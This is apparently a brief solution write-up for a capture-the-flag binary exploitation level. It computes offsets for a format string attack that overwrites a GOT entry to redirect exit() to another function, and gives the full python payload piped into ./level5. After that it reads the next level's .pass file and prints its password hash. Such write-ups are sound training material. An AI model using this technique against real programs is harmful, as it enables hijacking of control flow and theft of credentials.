aim : redirect call 

exit call to o() fonction in n() fonction.

fgets and printf as previous level.


so need to replace at 0x08049828	: 08 04 83 96 
		   by	 		: 08 04 84 a4  


they sub esp by 0x218, and start write at esp add 0x208.
So 0x10 mean 16 in decimal, adresses are on 4 octet, 4*4 = 16
6th args

padding for 84			: 132
size of injection		: 7
padding for a4			: 32
size of second injection	: 7

lengh of the string
132 + 7 + 32 + 7 = 178

find args padding args generate by the string
178 / 4 = 44


start of args
44 + 4 = 48

## an other way was more simple, by put adresses at the start of the string,
## so the arg start would be 4.



(python -c 'print "A" * 132 + "%49$hhn" + "B" * 32 + "%50$hhn" + "..\x39\x98\x04\x08\x38\x98\x04\x08"' ; cat -) | ./level5

cat /home/user/level6/.pass
d3b7bf1025225bd715fa8ccb54ef06ca70b9125ac855aeab4878217177f41a31
